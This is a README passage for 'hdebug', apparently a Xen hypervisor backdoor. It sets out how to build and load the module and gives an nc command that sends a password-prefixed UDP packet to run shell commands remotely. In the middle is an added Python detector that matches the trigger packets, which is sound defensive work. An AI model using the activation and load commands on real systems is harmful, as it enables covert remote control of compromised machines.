The -DCONFIG_X86_PAE in the Makefile should be removed if Xen runs in
non-PAE mode (which is unlikely).
The backdoor is activated by sending an appropriate UDP packet, e.g.
printf "\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbbshell commands to execute\x00" | \
	nc -u your.ip.address any_port
The first eight bytes are the password, checked in
hdebug-xen.c:parse_data().
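
For network monitoring, the trigger layout shown above (eight password bytes, then command text ending in a NUL byte, sent to any UDP port) can be matched on captured payloads. The following is an added example, not part of the original README or of hdebug; the function names, the "format-match" heuristic and the sample packets are assumptions made for illustration.

```python
import string

PASSWORD_LEN = 8  # README: the first eight bytes are the password
DEMO_PASSWORD = bytes.fromhex("aaaaaaaabbbbbbbb")  # value from the README's printf line
PRINTABLE = frozenset(string.printable.encode())

def classify_udp_payload(payload, known_passwords=(DEMO_PASSWORD,)):
    """Return 'known-password', 'format-match' or None for one UDP payload."""
    # Smallest trigger: 8-byte password + 1 command byte + terminating NUL.
    if len(payload) < PASSWORD_LEN + 2 or not payload.endswith(b"\x00"):
        return None
    prefix, command = payload[:PASSWORD_LEN], payload[PASSWORD_LEN:-1]
    # The command part is shell text: printable bytes only, no embedded NUL.
    if any(b not in PRINTABLE for b in command):
        return None
    if prefix in known_passwords:
        return "known-password"
    # Heuristic (assumption): a rebuilt copy may use another password, so also
    # flag a non-text 8-byte prefix followed by NUL-terminated text.
    if any(b not in PRINTABLE for b in prefix):
        return "format-match"
    return None

def scan(packets):
    """packets: iterable of (src, dst_port, payload). The port is ignored
    because the README says the trigger works on any port."""
    hits = []
    for src, dst_port, payload in packets:
        verdict = classify_udp_payload(payload)
        if verdict:
            hits.append((src, dst_port, verdict))
    return hits

# Constructed sample traffic (not captured from a real network).
SAMPLE_PACKETS = [
    ("192.0.2.10", 53, b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
                       b"\x07example\x03com\x00\x00\x01\x00\x01"),
    ("192.0.2.11", 514, b"<34>Oct 11 22:14:15 host su: auth failure\n"),
    ("192.0.2.66", 4444, DEMO_PASSWORD + b"uname -a\x00"),
    ("192.0.2.67", 123, b"\x01\x02\x03\x04\x05\x06\x07\x08id\x00"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_PACKETS):
        print(hit)
```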

If your NIC uses NAPI, load hdebug.o with
xenload hdebug.o scratch0=allocated_buf use_napi=1

The code in the "prefixes" directory (along with the kallsyms.sh script) is
meant to collect various function addresses. The code in skbuff_offset
(compile it manually with proper kernel headers) provides offsets to struct
sk_buff.
